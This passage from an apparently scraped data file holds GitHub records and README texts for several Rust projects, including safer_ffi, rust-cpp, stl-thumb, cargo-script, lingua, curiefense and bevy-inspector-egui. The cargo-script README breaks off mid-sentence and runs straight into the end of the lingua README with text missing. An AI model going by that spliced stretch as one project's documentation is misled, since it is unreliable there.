Click to hide\n\n#### Small self-contained demo\n\nYou may try working with the `examples/point` example embedded in the repo:\n\n```bash\ngit clone https://github.com/getditto/safer_ffi && cd safer_ffi\n(cd examples/point && make)\n```\n\nOtherwise, to start using `::safer_ffi`, follow the following steps:\n\n### Crate layout\n\n#### Step 1: `Cargo.toml`\n\nEdit your `Cargo.toml` like so:\n\n```toml\n[package]\nname = \"crate_name\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n[lib]\ncrate-type = [\n \"staticlib\", # Ensure it gets compiled as a (static) C library\n # \"cdylib\", # If you want a shared/dynamic C library (advanced)\n \"lib\", # For downstream Rust dependents: `examples/`, `tests/` etc.\n]\n\n[dependencies]\n# Use `cargo add` or `cargo search` to find the latest values of x.y.z.\n# For instance:\n# cargo add safer-ffi\nsafer-ffi.version = \"x.y.z\"\nsafer-ffi.features = [] # you may add some later on.\n\n[features]\n# If you want to generate the headers, use a feature-gate\n# to opt into doing so:\nheaders = [\"safer-ffi/headers\"]\n```\n\n - Where `\"x.y.z\"` ought to be replaced by the last released version, which you\n can find by running `cargo search safer-ffi`.\n\n - See the [dedicated chapter on `Cargo.toml`][cargo-toml] for more info.\n\n#### Step 2: `src/lib.rs`\n\nThen, to export a Rust function to FFI, add the\n[`#[derive_ReprC]`][derive_ReprC] and [`#[ffi_export]`][ffi_export] attributes\nlike so:\n\n```rust ,no_run\nuse ::safer_ffi::prelude::*;\n\n/// A `struct` usable from both Rust and C\n#[derive_ReprC]\n#[repr(C)]\n#[derive(Debug, Clone, Copy)]\npub struct Point {\n x: f64,\n y: f64,\n}\n\n/* Export a Rust function to the C world. */\n/// Returns the middle point of `[a, b]`.\n#[ffi_export]\nfn mid_point(a: &Point, b: &Point) -> Point {\n Point {\n x: (a.x + b.x) / 2.,\n y: (a.y + b.y) / 2.,\n }\n}\n\n/// Pretty-prints a point using Rust's formatting logic.\n#[ffi_export]\nfn print_point(point: &Point) {\n println!(\"{:?}\", point);\n}\n\n// The following function is only necessary for the header generation.\n#[cfg(feature = \"headers\")] // c.f. the `Cargo.toml` section\npub fn generate_headers() -> ::std::io::Result<()> {\n ::safer_ffi::headers::builder()\n .to_file(\"rust_points.h\")?\n .generate()\n}\n```\n\n - See [the dedicated chapter on `src/lib.rs`][lib-rs] for more info.\n\n#### Step 3: `examples/generate-headers.rs`\n\n```rust ,ignore\nfn main() -> ::std::io::Result<()> {\n ::crate_name::generate_headers()\n}\n```\n\n### Compilation & header generation\n\n```bash\n# Compile the C library (in `target/{debug,release}/libcrate_name.ext`)\ncargo build # --release\n\n# Generate the C header\ncargo run --features headers --example generate-headers\n```\n\n - See [the dedicated chapter on header generation][header-generation] for\n more info.\n\n
Generated C header (rust_points.h)\n\n```C\n/*! \\file */\n/*******************************************\n * *\n * File auto-generated by `::safer_ffi`. *\n * *\n * Do not manually edit this file. *\n * *\n *******************************************/\n\n#ifndef __RUST_CRATE_NAME__\n#define __RUST_CRATE_NAME__\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n\n#include \n#include \n\n/** \\brief\n * A `struct` usable from both Rust and C\n */\ntypedef struct Point {\n /** */\n double x;\n\n /** */\n double y;\n} Point_t;\n\n/** \\brief\n * Returns the middle point of `[a, b]`.\n */\nPoint_t\nmid_point (\n Point_t const * a,\n Point_t const * b);\n\n/** \\brief\n * Pretty-prints a point using Rust's formatting logic.\n */\nvoid\nprint_point (\n Point_t const * point);\n\n\n#ifdef __cplusplus\n} /* extern \\\"C\\\" */\n#endif\n\n#endif /* __RUST_CRATE_NAME__ */\n```\n\n___\n\n
\n\n## Testing it from C\n\nHere is a basic example to showcase FFI calling into our exported Rust\nfunctions:\n\n### `main.c`\n\n```C\n#include \n\n#include \"rust_points.h\"\n\nint\nmain (int argc, char const * const argv[])\n{\n Point_t a = { .x = 84, .y = 45 };\n Point_t b = { .x = 0, .y = 39 };\n Point_t m = mid_point(&a, &b);\n print_point(&m);\n return EXIT_SUCCESS;\n}\n```\n\n### Compilation command\n\n```bash\ncc -o main{,.c} -L target/debug -l crate_name -l{pthread,dl,m}\n\n# Now feel free to run the compiled binary\n./main\n```\n\n -
Note regarding the extra -l\u2026 flags.\n\n Those vary based on the version of the Rust standard library being used, and\n the system being used to compile it. In order to reliably know which ones to\n use, `rustc` itself ought to be queried for it.\n\n Simple command:\n\n ```bash\n rustc --crate-type=staticlib --print=native-static-libs -&1 | sed -nE 's/^note: native-static-libs: (.*)/\\1/p'\n ```\n\n Ideally, you would not query for this information _in a vacuum_ (_e.g._,\n `/dev/null` file being used as input Rust code just above), and rather,\n would apply it for your actual code being compiled:\n\n ```bash\n cargo rustc -q -- --print=native-static-libs \\\n 2>&1 | sed -nE 's/^note: native-static-libs: (.*)/\\1/p'\n ```\n\n And if you really wanted to polish things further, you could use the\n JSON-formatted compiler output (this, for instance, avoids having to\n redirect `stderr`). But then you'd have to use a JSON parser, such as `jq`:\n\n ```bash\n RUST_STDLIB_DEPS=$(set -eo pipefail && \\\n cargo rustc \\\n --message-format=json \\\n -- --print=native-static-libs \\\n | jq -r '\n select (.reason == \"compiler-message\")\n | .message.message\n ' | sed -nE 's/^native-static-libs: (.*)/\\1/p' \\\n )\n ```\n\n and then use:\n\n ```bash\n cc -o main{,.c} -L target/debug -l crate_name ${RUST_STDLIB_DEPS}\n ```\n\n
\n\nwhich does output:\n\n```text\nPoint { x: 42.0, y: 42.0 }\n```\n\n\ud83d\ude80\ud83d\ude80\n\n[callbacks]: https://getditto.github.io/safer_ffi/callbacks/_.html\n[cargo-toml]: https://getditto.github.io/safer_ffi/usage/cargo-toml.html\n[ffi_export]: https://getditto.github.io/safer_ffi/ffi-export/_.html\n[header-generation]: https://getditto.github.io/safer_ffi/usage/lib-rs.html#header-generation\n[derive_ReprC]: https://getditto.github.io/safer_ffi/derive-reprc/_.html\n[lib-rs]: https://getditto.github.io/safer_ffi/usage/lib-rs.html\n\n
\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mystor/rust-cpp", "link": "https://github.com/mystor/rust-cpp", "tags": ["rust", "macros", "rust-cpp", "c-plus-plus", "ffi"], "stars": 649, "description": "Embed C++ directly inside your rust code!", "lang": "Rust", "repo_lang": "", "readme": "# rust-cpp - Embed C++ code directly in Rust\n\n[![Build status](https://ci.appveyor.com/api/projects/status/uu76vmcrwnjqra0u/branch/master?svg=true)](https://ci.appveyor.com/project/mystor/rust-cpp/branch/master)\n[![Documentation](https://docs.rs/cpp/badge.svg)](https://docs.rs/cpp/)\n\n## Overview\n\n`rust-cpp` is a build tool & macro which enables you to write C++ code inline in\nyour rust code.\n\n```rust\nlet name = std::ffi::CString::new(\"World\").unwrap();\nlet name_ptr = name.as_ptr();\nlet r = unsafe {\n cpp!([name_ptr as \"const char *\"] -> u32 as \"int32_t\" {\n std::cout << \"Hello, \" << name_ptr << std::endl;\n return 42;\n })\n};\nassert_eq!(r, 42)\n```\n\nThe crate also help to expose some C++ class to Rust by automatically\nimplementing trait such as Drop, Clone (if the C++ type can be copied), and others\n\n```rust\ncpp_class!{\n #[derive(PartialEq)]\n unsafe struct MyClass as \"std::unique_ptr\"\n}\n```\n\n## Usage\n\nFor usage information and in-depth documentation, see\nthe [`cpp` crate module level documentation](https://docs.rs/cpp).\n\n\n## Differences with the [`cxx`](https://cxx.rs) crate\n\nThis crate allows to write C++ code \"inline\" within your Rust functions, while with the [`cxx`](https://cxx.rs) crate, you have\nto write a bit of boiler plate to have calls to functions declared in a different `.cpp` file.\n\nHaving C++ code inline might be helpful when trying to call to a C++ library and that one may wish to make plenty of call to small snippets.\nIt can otherwise be fastidious to write and maintain the boiler plate for many small functions in different places. \n\nThese crate can also be used in together. The `cxx` crate offer some useful types such as `CxxString` that can also be used with this crate.\n\nThe `cxx` bridge does more type checking which can avoid some classes of errors. While this crate can only check for equal size and alignment.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "unlimitedbacon/stl-thumb", "link": "https://github.com/unlimitedbacon/stl-thumb", "tags": ["3d-printing", "stl-files", "3d-models"], "stars": 648, "description": "Thumbnail generator for STL files", "lang": "Rust", "repo_lang": "", "readme": "# stl-thumb\n\n[![Build Status](https://github.com/unlimitedbacon/stl-thumb/workflows/Build/badge.svg)](https://github.com/unlimitedbacon/stl-thumb/actions/workflows/build-ci.yml)\n[![Build Status](https://ci.appveyor.com/api/projects/status/exol1llladgo3f98/branch/master?svg=true)](https://ci.appveyor.com/project/unlimitedbacon/stl-thumb/branch/master)\n[![Documentation](https://img.shields.io/docsrs/stl-thumb/latest)](https://docs.rs/stl-thumb/latest/stl_thumb/)\n[![Crates.io](https://img.shields.io/crates/v/stl-thumb.svg)](https://crates.io/crates/stl-thumb)\n\nStl-thumb is a fast lightweight thumbnail generator for STL files. It can show previews for STL files in your file manager on Linux and Windows. It is written in Rust and uses OpenGL.\n\n![Screenshot](https://user-images.githubusercontent.com/3131268/116009182-f3f89c80-a5cc-11eb-817d-91e8a9fad279.png)\n\n## Installation\n\n### Windows\n\nStl-thumb requires 64 bit Windows 7 or later. [Download the installer .exe](https://github.com/unlimitedbacon/stl-thumb/releases/latest) for the latest release and run it.\n\nThe installer will tell the Windows shell to refresh the thumbnail cache, however this does not always seem to work. If your icons do not change then try using the [Disk Cleanup](https://en.wikipedia.org/wiki/Disk_Cleanup) utility to clear the thumbnail cache.\n\n### Linux\n\nStl-thumb works with Gnome and most other similar desktop environements. If you are using the KDE desktop environment then you will also need to install the seperate [`stl-thumb-kde`](https://github.com/unlimitedbacon/stl-thumb-kde) package.\n\nMake sure that your file manager is set to generate previews for files larger than 1 MB. Most file managers have this setting under the Preview tab in their Preferences.\n\n#### Arch\n\nA package is available [in the AUR](https://aur.archlinux.org/packages/stl-thumb/). Install it manually or using your favorite AUR helper.\n\n```\n$ yay -S stl-thumb\n```\n\n#### Debian / Ubuntu\n\n[Download the .deb package](https://github.com/unlimitedbacon/stl-thumb/releases/latest) for your platform (usually amd64) and install it. Packages are also available for armhf (Raspberry Pi) and arm64 (Pine64 and other SBCs).\n\n```\n$ sudo apt install ./stl-thumb_0.4.0_amd64.deb\n```\n\n#### openSUSE\n\nFor openSUSE Tumblweed there is a user repo available:\n\n```\n$ sudo zypper ar -f obs://home:jubalh:stl stl\n$ sudo zypper ref\n$ sudo zypper install stl-thumb\n```\n\n## Building\n\n### Building the tool itself:\nYou can build the debug version with:\n```\n$ cargo build\n```\nWhen your done, build the realease version with:\n```\n$ cargo build --release\n```\n### Building the .deb-package:\n```\n$ cargo install cargo-deb #this is an additional dependency\n$ cargo deb\n```\n### Building the .rpm-package:\n```\n$ cargo install cargo-rpm #this is an additional dependency\n$ cargo rpm build\n```\n\n## Command Line Usage\n\n```\n$ stl-thumb [IMG_FILE]\n```\n\n### Options\n\n| Option | Description |\n| ------------- | ------------------------------------------------------- |\n| | The STL file you want a picture of. Use - to read from stdin instead of a file. |\n| | The thumbnail image file that will be created. Use - to write to stdout instead of a file. |\n| -s, --size \\ | Specify width of the image. It will always be a square. |\n| -f, --format \\ | The format of the image file. If not specified it will be determined from the file extension, or default to PNG if there is no extension. Supported formats: PNG, JPEG, GIF, ICO, BMP |\n| -m, --material \\ \\ \\ | Colors for rendering the mesh using the Phong reflection model. Requires 3 colors as rgb hex values: ambient, diffuse, and specular. Defaults to blue. |\n| -b, --backround \\ | The background color with transparency (rgba). Default is ffffff00. |\n| -a, --antialiasing [none, fxaa] | Anti-aliasing method. Default is FXAA, which is fast but may introduce artifacts. |\n| --recalc-normals | Force recalculation of face normals. Use when dealing with malformed STL files. |\n| -x | Display the image in a window instead of saving a file. |\n| -h, --help | Prints help information. |\n| -V, --version | Prints version information. |\n| -v[v][v] | Increase message verbosity. Levels: Errors, Warnings, Info, Debugging |\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "DanielKeep/cargo-script", "link": "https://github.com/DanielKeep/cargo-script", "tags": [], "stars": 648, "description": "Cargo script subcommand", "lang": "Rust", "repo_lang": "", "readme": "# `cargo-script`\n\n`cargo-script` is a Cargo subcommand designed to let people quickly and easily run Rust \"scripts\" which can make use of Cargo's package ecosystem. It can also evaluate expressions and run filters.\n\nSome of `cargo-script`'s features include:\n\n- Reading Cargo manifests embedded in Rust scripts.\n- Caching compiled artefacts (including dependencies) to amortise build times.\n- Supporting executable Rust scripts via UNIX hashbangs and Windows file associations.\n- Evaluating expressions on the command-line.\n- Using expressions as stream filters (*i.e.* for use in command pipelines).\n- Running unit tests and benchmarks from scripts.\n- Custom templates for command-line expressions and filters.\n\n**Note**: `cargo-script` *does not* work when Cargo is instructed to use a target architecture different to the default host architecture.\n\nTable of contents:\n\n- [Installation](#installation)\n - [Migrating From Previous Versions](#migrating)\n - [Features](#features)\n - [Manually Compiling and Installing](#compiling)\n - [Self-Executing Scripts](#hashbang)\n- [Usage](#usage)\n - [Scripts](#scripts)\n - [Expressions](#expressions)\n - [Stream Filters](#filters)\n - [Environment Variables](#env-vars)\n - [Templates](#templates)\n- [Known Issues](#issues)\n- [License](#license)\n - [Contribution](#contribution)\n\n\n## Installation\n\nThe recommended method for installing `cargo-script` is by using Cargo's `install` subcommand:\n\n```sh\ncargo install cargo-script\n```\n\nIf you have already installed `cargo-script`, you can update to the latest version by using:\n\n```sh\ncargo install --force cargo-script\n```\n\n\n### Migrating From Previous Versions\n\n`cargo-script` supports migrating data from previous versions. This is not mandatory, but may be preferred. Using `cargo script --migrate-data dry-run` will perform a \"dry run\", informing you of any applicable migrations. Using the `for-real` option will actually perform the migration. The following migrations may be applicable:\n\n- 0.1 \u2192 0.2: On non-Windows platforms, and when `CARGO_HOME` is defined, moves the location for cached data from `$CARGO_HOME/.cargo` to `$CARGO_HOME`.\n\n\n### Cargo Features\n\nThe following features are defined:\n\n- `suppress-cargo-output` (default): if building the script takes less than 2 seconds and succeeds, `cargo-script` will suppress Cargo's output. Note that this disabled coloured Cargo output on Windows.\n\n\n### Manually Compiling and Installing\n\n`cargo-script` requires Rust 1.11 or higher to build. Rust 1.4+ was supported prior to version 0.2.\n\nOnce built, you should place the resulting executable somewhere on your `PATH`. At that point, you should be able to invoke it by using `cargo script`. Note that you *can* run the executable directly, but the first argument will *need* to be `script`.\n\nIf you want to run `cargo script` from a hashbang on UNIX, or via file associations on Windows, you should also install the `run-cargo-script` program somewhere on `PATH`.\n\n\n### Self-Executing Scripts\n\nOn UNIX systems, you can use `#!/usr/bin/env run-cargo-script` as a hashbang line in a Rust script. If the script file is executable, this will allow you to execute a script file directly.\n\nIf you are using Windows, you can associate the `.crs` extension (which is simply a renamed `.rs` file) with `run-cargo-script`. This allows you to execute Rust scripts simply by naming them like any other executable or script.\n\nThis can be done using the `cargo-script file-association` command (note the hyphen in `cargo-script`). This command can also remove the file association. If you pass `--amend-pathext` to the `file-assocation install` command, it will also allow you to execute `.crs` scripts *without* having to specify the file extension, in the same way that `.exe` and `.bat` files can be used.\n\nIf you want to make a script usable across platforms, it is recommended that you use *both* a hashbang line *and* give the file a `.crs` file extension.\n\n\n## Usage\n\nGenerally, you will want to use `cargo-script` by invoking it as `cargo script` (note the lack of a hypen). Doing so is equivalent to invoking it as `cargo-script script`. `cargo-script` supports several other subcommands, which can be accessed by running `cargo-script` directly. You can also get an overview of the available options using the `--help` flag.\n\n\n### Scripts\n\nThe primary use for `cargo-script` is for running Rust source files as scripts. For example:\n\n```shell\n$ echo 'fn main() { println!(\"Hello, World!\"); }' > hello.rs\n$ cargo script hello.rs\nHello, World!\n$ cargo script hello # you can leave off the file extension\nHello, World!\n```\n\nThe output of Cargo will be hidden unless compilation fails, or takes longer than a few seconds.\n\n`cargo-script` will also look for embedded dependency and manifest information in the script. For example, all of the following are equivalent:\n\n- `now.crs` (code block manifest with UNIX hashbang and `.crs` extension):\n\n ```rust\n #!/usr/bin/env run-cargo-script\n //! This is a regular crate doc comment, but it also contains a partial\n //! Cargo manifest. Note the use of a *fenced* code block, and the\n //! `cargo` \"language\".\n //!\n //! ```cargo\n //! [dependencies]\n //! time = \"0.1.25\"\n //! ```\n extern crate time;\n fn main() {\n println!(\"{}\", time::now().rfc822z());\n }\n ```\n\n- `now.rs` (dependency-only, short-hand manifest):\n\n ```rust\n // cargo-deps: time=\"0.1.25\"\n // You can also leave off the version number, in which case, it's assumed\n // to be \"*\". Also, the `cargo-deps` comment *must* be a single-line\n // comment, and it *must* be the first thing in the file, after the\n // hashbang.\n extern crate time;\n fn main() {\n println!(\"{}\", time::now().rfc822z());\n }\n ```\n\n > **Note**: you can write multiple dependencies by separating them with commas. *E.g.* `time=\"0.1.25\", libc=\"0.2.5\"`.\n\nOn running either of these, `cargo-script` will generate a Cargo package, build it, and run the result. The output may look something like:\n\n```shell\n$ cargo script now\n Updating registry `https://github.com/rust-lang/crates.io-index`\n Compiling winapi-build v0.1.1\n Compiling winapi v0.2.8\n Compiling libc v0.2.30\n Compiling kernel32-sys v0.2.2\n Compiling time v0.1.38\n Compiling now v0.1.0 (file:///C:/Users/drk/AppData/Local/Cargo/script-cache/file-now-37cb982cd51cc8b1)\n Finished release [optimized] target(s) in 49.7 secs\nSun, 17 Sep 2017 20:38:58 +1000\n```\n\nSubsequent runs, provided the script has not changed, will likely just run the cached executable directly:\n\n```shell\n$ cargo script now\nSun, 17 Sep 2017 20:39:40 +1000\n```\n\nUseful command-line arguments:\n\n- `--bench`: Compile and run benchmarks. Requires a nightly toolchain.\n- `--debug`: Build a debug executable, not an optimised one.\n- `--features `: Cargo features to pass when building and running.\n- `--force`: Force the script to be rebuilt. Useful if you want to force a recompile with a different toolchain.\n- `--gen-pkg-only`: Generate the Cargo package, but don't compile or run it. Effectively \"unpacks\" the script into a Cargo package.\n- `--test`: Compile and run tests.\n\n\n### Expressions\n\n`cargo-script` can also run pieces of Rust code directly from the command line. This is done by providing the `--expr` option; this causes `cargo-script` to interpret the `\n```\n\nThere are also some integration tests available both for Node.js and for the browsers Chrome and Firefox.\nTo run them, simply say:\n\n wasm-pack test --node --headless --chrome --firefox\n\nThe output of `wasm-pack` will be hosted in a [separate repository](https://github.com/pemistahl/lingua-js) which\nallows to add further JavaScript-related configuration, tests and documentation. *Lingua* will then be added to the \n[npm registry](https://www.npmjs.com) as well, allowing for an easy download and installation within every JavaScript \nor TypeScript project.\n\n## 11. What's next for version 1.5.0?\n\nTake a look at the [planned issues](https://github.com/pemistahl/lingua-rs/milestone/7).\n\n## 12. Contributions\n\n- [Josh Rotenberg](https://github.com/joshrotenberg) has written a [wrapper](https://github.com/joshrotenberg/lingua_ex)\nfor using *Lingua* with the [Elixir programming language](https://elixir-lang.org/).\n \n- [Simon Liang](https://github.com/lhr0909) has written a [wrapper](https://github.com/xanthous-tech/lingua-node)\nfor using *Lingua* with [NodeJS](https://nodejs.org/).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "curiefense/curiefense", "link": "https://github.com/curiefense/curiefense", "tags": ["envoyproxy", "waf", "botmanagement", "ddos", "cloud-native", "microservices", "security", "rate-limiter", "ddos-protection", "session", "bot-management", "cncf"], "stars": 591, "description": "Curiefense is a unified, open source platform protecting cloud native applications.", "lang": "Rust", "repo_lang": "", "readme": "
\n\t\"Curiefense\n\t

\n
\n\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/4576/badge)](https://bestpractices.coreinfrastructure.org/projects/4576) \n[![CodeQL](https://github.com/curiefense/curiefense/actions/workflows/codeql-analysis.yml/badge.svg)](https://github.com/curiefense/curiefense/actions/workflows/codeql-analysis.yml)\n[![GitHub](https://img.shields.io/github/license/curiefense/curiefense)](https://github.com/curiefense/curiefense/blob/master/LICENSE)\n[![CNCF](https://shields.io/badge/CNCF-Sandbox%20project-blue?logo=linux-foundation&style=flat)](https://landscape.cncf.io/card-mode?project=sandbox&selected=curiefense)\n[![Slack](https://shields.io/badge/Slack-Join%20Us-yellow?logo=slack&style=flat)](https://join.slack.com/t/curiefense/shared_invite/zt-nc8lyrjo-JJoY2mwrqNOfkmoA6ycTHg)\n[![Twitter](https://img.shields.io/badge/Follow-@curiefense-blue.svg?style=flat&logo=twitter)](https://twitter.com/intent/follow?screen_name=curiefense)\n\n\n---\n\nCuriefense is a new application security platform, which protects sites, services, and APIs. It extends Envoy proxy to defend against a variety of threats, including SQL and command injection, cross site scripting (XSS), account takeovers (ATOs), application-layer DDoS, remote file inclusion (RFI), API abuse, and more.\n\n## Getting Started\n\n## Documentation\n\n* [Curiefense Documentation](https://docs.curiefense.io)\n* [Quick Start Guide](https://docs.curiefense.io/installation/getting-started-with-curiefense)\n* [FAQ](https://www.curiefense.io/faq)\n\n### Docker\n```bash\ngit clone https://github.com/curiefense/curiefense.git\ncd curiefense/deploy/compose/\ndocker-compose up\n```\n\n### Video Overview\n\n\n\n\n
\n\n## Community\n\nThere are many ways to get involved with Curiefense. \n\n* [Twitter](https://twitter.com/curiefense)\n* [CNCF Community Group](https://community.cncf.io/curiefense/)\n* [Slack](https://join.slack.com/t/curiefense/shared_invite/zt-nc8lyrjo-JJoY2mwrqNOfkmoA6ycTHg)\n\n
\n\n---\n\n
\n\nThis project is named after the famous scientist [Marie Salomea Sk\u0142odowska Curie](https://www.curiefense.io/marie-curie). It began in intensive work sessions at Malakoff France, close to her home and laboratory in the outskirts of Paris, and is being released on her birthday (November 7th).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "turnage/valora", "link": "https://github.com/turnage/valora", "tags": [], "stars": 590, "description": "painting by functions", "lang": "Rust", "repo_lang": "", "readme": "# valora\n\n[![](https://docs.rs/valora/badge.svg)](https://docs.rs/valora) [![crates.io](https://img.shields.io/crates/v/valora.svg)](https://crates.io/crates/valora) ![Rust](https://github.com/turnage/valora/workflows/Rust/badge.svg?branch=master)\n\nA brush for generative fine art. [Read the guide!](https://paytonturnage.gitbook.io/valora/)\n\nThis a graphics library and CLI focused on generative fine art for print.\n\nFeatures\n\n* Repeatable works at arbitrary resolutions without changing the work\n* Managed rngs for repeatable works and controlled rng trees\n* Support for using a different, custom GLSL shader for each vector path\n* GLSL live coding with \"#include\" support\n* An ergonomic derive-based GLSL uniforms interface\n* Animation support for brainstorming and cumulative pieces\n\n![](https://i.imgur.com/e2rsMVb.png)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jakobhellermann/bevy-inspector-egui", "link": "https://github.com/jakobhellermann/bevy-inspector-egui", "tags": [], "stars": 590, "description": "Inspector plugin for the bevy game engine", "lang": "Rust", "repo_lang": "", "readme": "# bevy-inspector-egui\n\nExamples can be found at [`./crates/bevy-inspector-egui/examples`](./crates/bevy-inspector-egui/examples/).\n\nMigration guide for 0.16 is at [`docs/MIGRATION_GUIDE_0.15_0.16.md`](./docs/MIGRATION_GUIDE_0.15_0.16.md)\n\nThis crate contains\n- general purpose machinery for displaying [`Reflect`](bevy_reflect::Reflect) values in [reflect_inspector],\n- a way of associating arbitrary options with fields and enum variants in [inspector_options]\n- utility functions for displaying bevy resource, entities and assets in [bevy_inspector]\n- some drop-in plugins in [quick] to get you started without any code necessary.\n\nThe changelog can be found at [`docs/CHANGELOG.md`](./docs/CHANGELOG.md).\n\n# Use case 1: Quick plugins\nThese plugins can be easily added to your app, but don't allow for customization of the presentation and content.\n\n## WorldInspectorPlugin\nDisplays the world's entities, resources and assets.\n\n![image of the world inspector](https://raw.githubusercontent.com/jakobhellermann/bevy-inspector-egui/main/docs/images/world_inspector.png)\n\n```rust\nuse bevy::prelude::*;\nuse bevy_inspector_egui::quick::WorldInspectorPlugin;\n\nfn main() {\n App::new()\n .add_plugins(DefaultPlugins)\n .add_plugin(WorldInspectorPlugin)\n .run();\n}\n```\n## ResourceInspectorPlugin\nDisplay a single resource in a window.\n\n![image of the resource inspector](https://raw.githubusercontent.com/jakobhellermann/bevy-inspector-egui/main/docs/images/resource_inspector.png)\n\n```rust\nuse bevy::prelude::*;\nuse bevy_inspector_egui::prelude::*;\nuse bevy_inspector_egui::quick::ResourceInspectorPlugin;\n\n// `InspectorOptions` are completely optional\n#[derive(Reflect, Resource, Default, InspectorOptions)]\n#[reflect(Resource, InspectorOptions)]\nstruct Configuration {\n name: String,\n #[inspector(min = 0.0, max = 1.0)]\n option: f32,\n}\n\nfn main() {\n App::new()\n .add_plugins(DefaultPlugins)\n .init_resource::() // `ResourceInspectorPlugin` won't initialize the resource\n .register_type::() // you need to register your type to display it\n .add_plugin(ResourceInspectorPlugin::::default())\n // also works with built-in resources, as long as they are `Reflect\n .add_plugin(ResourceInspectorPlugin::